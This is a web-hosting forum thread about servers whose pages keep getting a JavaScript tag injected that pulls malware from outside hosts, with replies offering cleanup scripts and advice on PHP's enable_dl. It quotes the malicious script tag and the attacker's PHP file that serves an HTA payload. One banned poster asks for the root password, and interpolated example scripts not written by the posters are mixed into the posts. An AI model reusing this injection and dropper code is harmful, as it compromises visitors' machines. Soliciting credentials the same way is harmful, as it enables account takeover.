Virus TROJAN.DROPPER, need help!

elenlace

Well-Known Member
Sep 10, 2002
US
Hello,

We have cPanel and the whole server has been infected with a virus called BLOODHOUND.EXPLOIT and/or TROJAN.DROPPER, VBS/INOR, etc. I have cPanel's open_basedir security enabled, so I have no idea how it has spread to all the sites.

The code that is "inserted" into webpages varies, but it is usually:

<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>

We need help, and we are willing to pay an expert to clean our server and give us the "recipe" to solve similar issues in the future.

Regards,

elenlace

PS: We have already restored the server, and bringing the sites back from backups restarted the virus spread.
 

WebKingPin

Member
Dec 5, 2003
Not sure those are your problem

Hi,

I have researched both of the viruses you claim have infected your system.
I take it you are running a UNIX box, correct?
If so, neither variant affects UNIX.
http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.6.html

Are you running osCommerce on any of your sites? If so, you may want to check the directories. We noticed a security hole in the latest release which allows someone to add files to the cart system. I am not sure exactly how they did this, but I removed 2 zip files containing trojans deeply nested within folders with random names in the osCommerce dir.

Hope this helps,

WKP
 

WebKingPin

Member
Dec 5, 2003
aww yes

Thinking....

After further review of the Symantec site, I would say that it is definitely something on your local machine. The virus is defined as an Internet Explorer vulnerability. Sounds to me like you need to update from the MS website and run a virus scan on your PC.

I could be wrong but this is what I think your problem is.


later,
WKP
 

AbeFroman

BANNED
Feb 16, 2002
This script will fix it:
#!/bin/sh
# Find every file under /home that carries the injected tag (the string "deckewwwr2" only
# occurs inside it), back the file up, strip the tag, then drop the backup.
cd /home
files=`grep -r -l deckewwwr2 * | grep -v convert`
for ii in $files; do
echo "Processing $ii"
cp -p "$ii" "$ii.bak"
# The sed expression must stay on one line. cp -p and the > redirect keep the page's owner and mode.
sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>||g' "$ii.bak" > "$ii"
rm "$ii.bak"
done

What kernel are you using? (uname -r)
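A more robust version of the same cleanup, added here as an example (it is not AbeFroman's script and not cPanel's): it matches the whole injected tag by its marker string, survives paths with spaces, and keeps the infected copy for later analysis. The web root, file extensions and backup suffix are assumptions; adjust them to your layout.

```shell
#!/bin/sh
# Added example, not the script from the thread. Removes the injected <script> tag from every
# page under a web root. The marker "deckewwwr2" comes from the first post; everything else
# (extensions scanned, backup suffix, demo data) is an assumption.
MARKER='deckewwwr2'
# Basic regex for the whole injected tag: any <script ...> whose attributes contain the marker.
TAG_RE='<script[^>]*'"$MARKER"'[^>]*></script>'

# clean_file FILE: strip the tag in place; returns 0 if the file was changed, 1 if it was clean.
clean_file() {
    f=$1
    grep -q "$TAG_RE" "$f" || return 1          # no injected tag: leave the file alone
    cp -p "$f" "$f.infected.bak"                # keep the infected copy (owner/mode preserved)
    sed -e "s|$TAG_RE||g" "$f.infected.bak" > "$f"   # > truncates in place, so owner/mode stay
    echo "cleaned: $f"
}

# clean_tree DIR: clean every page under DIR. find -exec plus read -r avoids the word-splitting
# of "for f in $files", so a path with spaces is handled correctly.
clean_tree() {
    find "$1" -type f \( -name '*.htm' -o -name '*.html' -o -name '*.php' \) \
        -exec grep -l "$MARKER" {} \; |
    while IFS= read -r f; do clean_file "$f" || true; done
}

# demo: constructed sample page (not real site data) run through clean_tree in a temp dir.
demo() {
    d=$(mktemp -d); mkdir "$d/sub dir"
    printf '%s\n' '<html><body>hi<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script></body></html>' > "$d/sub dir/index.html"
    clean_tree "$d"
    cat "$d/sub dir/index.html"        # <html><body>hi</body></html>
}
```

Run `demo` to watch it on the constructed sample, or `clean_tree /home` on the server; the `.infected.bak` copies are what you hand to whoever investigates how the tag got there.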
 

elenlace

Well-Known Member
Sep 10, 2002
US
Hi Abe,

I'm using 2.4.21-15.0.4.ELsmp.

I do have an idea how this happened. A local user (someone that purchased an account, later found to be a malicious user) put 3 files on his hosting.

data.hta
spl.php
index.htm

spl.php was a PHP script "compiling" the information in data.hta.

From there, it spread like a disease. Every account is getting it, and I can't find anything wrong with the server. Of course, it has been days since the malicious user's account was cancelled and he has no access to the server. I have limited SSH to only my IP and ran rkhunter to check for rootkits. I have even run the evaluation version of McAfee for Linux and found nothing wrong as well. It only initially detected the virus as VBS/Inor on the backup of the malicious user's account.

I even restored the server last Sunday night, brought the sites up using the cPanel backup, and the virus showed up AGAIN.

It calls several websites, mainly asbestos-ccl.com. I can put the complete list if it helps.

The viruses it tries to spread are a variety of Bloodhound, Generic Trojan, JavaScript virus, etc.

It is important to mention that we are very security-aware:

TMP noexec nosuid
APF firewall blocking most ports INGRESS OUTGRESS
MailScanner+ClamAV for Exim (I'm aware this probably has nothing to do with this exploit)
rkhunter run daily (0 rootkits so far)
SSH limited to our ISP's IP Block
No SSH for customers (of course blocked by the previous statement)
Always latest, secure kernel
Latest stable version of CPanel
Latest version of Apache
PHP 4.3.8

WHAT ELSE DO WE NEED?

I hope this thread helps anyone having this very annoying problem in the future. We will find a solution and once I find it I will post it here.

Regards,

elenlace
 

elenlace

Well-Known Member
Sep 10, 2002
US
Further information on this issue:

The PHP file contained:

<?php
// Serves the local data.hta file with the HTA content type, so a Windows browser hands it
// to the HTML Application host instead of rendering it as a page.
header("content-type: application/hta");
$szFile="data.hta";
$hFile=fopen($szFile, "r");
$szHTML=fread($hFile,filesize($szFile));
fclose($hFile);
echo($szHTML);
?>

The .hta was a bunch of code, probably binary content "compiled" by the previous code.
 

AbeFroman

BANNED
Feb 16, 2002
Upgrade your kernel ASAP!


Did this script work?
#!/bin/sh
# Find every file under /home that carries the injected tag (the string "deckewwwr2" only
# occurs inside it), back the file up, strip the tag, then drop the backup.
cd /home
files=`grep -r -l deckewwwr2 * | grep -v convert`
for ii in $files; do
echo "Processing $ii"
cp -p "$ii" "$ii.bak"
# The sed expression must stay on one line. cp -p and the > redirect keep the page's owner and mode.
sed -e 's|<script language="JavaScript" src="http://www.asbestos-ccl.com/guestbook/public/catalog/test.html?i=28faf11f3d9c07ffdc3fd7ceb7db7598&to=http://elfwood.lysator.liu.se/fanq/d/e/deckewwwr2/lamo-admin.html"></script>||g' "$ii.bak" > "$ii"
rm "$ii.bak"
done
 

AbeFroman

BANNED
Feb 16, 2002
Create a file called
fixpages
put my script in fixpages
chmod 700 fixpages
./fixpages
 

AbeFroman

BANNED
Feb 16, 2002
Email me your root password if you want me to take a look.

Do you have physical access to this server?
 

tinboye22

Active Member
Sep 16, 2004
Bloodhound Exploit 54 - NEW!!

My server was infected by this virus through a backdoor in a file that was installed by cPanel.
Once I found out about it, my IT people were quick to rectify it, but I wanted to share this with others that may have this issue.

The enable_dl function in PHP is to blame; all you need to do is turn it off and remove the trojans, and then your server will function fine. Be aware some scripts require this file to function, but as soon as you enable it your server will be exploited again.

thanks

Justin
 

chirpy

Well-Known Member
Verified Vendor
Jun 15, 2002
Go on, have a guess
Just to clarify - your server would not have been infected by this. The server would have been compromised through a vulnerable PHP script and then that dynamic module installed. It is that module which redirects sites, and that is what infects Windows PCs with that virus. So, this is a server compromise due to insecure scripts, not a virus infection, which implies something different:

http://securityresponse.symantec.com/avcenter/venc/data/bloodhound.exploit.54.html

Either way, disabling enable_dl is always a good idea.
 

hostit1

Well-Known Member
Jul 24, 2003
How do you find root cause

Hello,

We have a terrible trojan that gets loaded into memory. How do we find out where the trojan is spawning its exploit into memory?

What should I look for? I believe it is somewhere in the home directory.

Any ideas?

Kernel of the infected machine(s) 2.6.9-11.ELsmp & 2.6.9-22.0.1.ELsmp
I have updated the kernel today to 2.6.9-34.0.1.ELsmp on both machines as well as performed a /scripts/upcp

Should that fix the problem? I would love to find out where this trojan is "hiding" at so I can clean it up.

We have mod_security and mod_evasive installed, as well as APF.

Also, I ran the latest version of rkhunter and chkrootkit and they both found nothing.

Tim Rice
Host It Now Networks
 

chirpy

Well-Known Member
Verified Vendor
Jun 15, 2002
Go on, have a guess
Well, you've posted to an old thread which is probably irrelevant to your problem, which is always the danger when digging them up like this rather than simply starting a new thread, which would be more appropriate.

You need to explain more about why you think you have a trojan in memory and how it is manifesting. There are very, very few real trojans or viruses for Linux. The most likely exploit these days that loads into memory is if you have allowed dynamic libraries in php.ini, in which case you should disable it:

enable_dl = Off

Then restart httpd.
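An added triage script for the case chirpy describes (example code, not from chirpy or cPanel): it tells on-disk injection apart from runtime injection by comparing a page file with a saved copy of what the server actually sent, and it lists shared objects mapped into a process from outside the system library directories, which is where a module loaded through dl() from /tmp or a home directory would show up. The process names, library directories and the sample maps data are assumptions.

```shell
#!/bin/sh
# Added example, not from the thread. Two checks for "the tag is in every site but not in
# the files": (1) compare disk copy with served copy, (2) look at what httpd has mapped.
# Save the served copy first, e.g.  curl -s http://site.example/ > served.html
# The httpd/apache2 process names and the trusted library prefixes are assumptions.

# served_vs_disk DISKFILE SERVEDFILE TAG: prints runtime-injected, on-disk or absent.
served_vs_disk() {
    disk=$(grep -cF "$3" "$1" || true)       # || true: grep -c exits 1 on a zero count
    served=$(grep -cF "$3" "$2" || true)
    if [ "$served" -gt 0 ] && [ "$disk" -eq 0 ]; then
        echo runtime-injected                 # file is clean, response is not: look at httpd itself
    elif [ "$disk" -gt 0 ]; then
        echo on-disk                          # the page file was edited: clean the files
    else
        echo absent
    fi
}

# suspicious_so MAPSFILE: reads a /proc/PID/maps file (or a copy saved as evidence) and lists
# mapped shared objects outside /lib, /usr/lib and /usr/local/lib. Field 6 is the path.
suspicious_so() {
    awk '$6 ~ /\.so/ && $6 !~ /^\/(usr\/(local\/)?)?lib/ { print $6 }' "$1" | sort -u
}

# httpd_so: run suspicious_so over every live web server worker (needs root to read maps).
httpd_so() {
    for pid in $(pgrep -x httpd; pgrep -x apache2); do
        suspicious_so "/proc/$pid/maps" 2>/dev/null | sed "s|^|pid $pid: |"
    done
}

# demo: constructed maps sample (not from a real host) run through suspicious_so.
demo() {
    m=$(mktemp)
    cat > "$m" <<'EOF'
7f0000000000-7f0000001000 r-xp 00000000 08:01 1234 /usr/lib/libc.so.6
7f0000002000-7f0000003000 r-xp 00000000 08:01 5678 /tmp/.x/ghfdl.so
7f0000006000-7f0000007000 rw-p 00000000 00:00 0
EOF
    suspicious_so "$m"        # prints /tmp/.x/ghfdl.so
    rm -f "$m"
}
```

A runtime-injected result plus a .so under /tmp or /home in a worker's maps is the pattern this thread is about; restarting httpd clears the mapping, which is why things look fine for a while and then come back.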
 

hostit1

Well-Known Member
Jul 24, 2003
Sorry John if I posted in the wrong area. It seems like the post was very similar to the behavior that I am seeing.

I do have enable_dl turned off in php.ini. I see very little usefulness in enabling this.
Many clients complain that there will be code added to their pages, such as a JavaScript source for a non-existent file.

Others state that their anti-virus software detects a trojan when visiting certain sites.

I have moved some of the larger clients who have complained about this to their own dedicated cpanel server.
If I restart the server, things are great for a while, then the complaints start coming back in.


BTW, we enjoyed the cpanel training in Houston.

Tim
 

kashif

Active Member
Jul 11, 2003
Lahore
Javascript for trojan auto inserted in all websites

Hi Chirpy,

Sorry if I have not posted this in the correct thread. Actually, I have a very serious issue: all the websites on my server are getting the JavaScript code for a trojan automatically inserted in their pages, e.g.

<script language='JavaScript' type='text/javascript' src='ghfdl.js'></script>

And then I get a message on a Windows PC with NOD32 of a trojan being downloaded from that server. I have tried to find where it is loading from but couldn't. Can you kindly tell me how I can find where it is loading from on all websites? And also one more issue: I can't create directories or files with names having only numerics, e.g. mkdir 123456 will give me this error:

mkdir: cannot create directory `123456': No such file or directory

even though that directory doesn't exist anywhere on the server. Can you kindly provide any guidelines in this regard, especially on the trojan JavaScript issue? I have already disabled enable_dl in php.ini.

Thank you,

Best Regards,
 

kashif

Active Member
Jul 11, 2003
Lahore
Can anyone help me in this regard? How can I disable that JavaScript being added to every website? No rootkit was found on the server either...
 

AndyReed

Well-Known Member
PartnerNOC
May 29, 2004
Minneapolis, MN
This is one of the most recent Linux exploits. Try the following: run ClamAV and F-Prot. Also run chkrootkit and rkhunter. If none of these help, you can seek help from your host, or seek professional help. Good luck!
 

kashif

Active Member
Jul 11, 2003
Lahore
Hi Andy,
But how can I detect where that JavaScript is being added from in all websites... Do tell me so that I can fix this ASAP....

Thanks....
 

danbriant

Registered
Jan 9, 2008
I am having the exact same issue as well, except my JS call is like this:
<script language='JavaScript' type='text/javascript' src='avabf.js'></script>
I ran rkhunter and found nothing; about to run a ClamAV scan.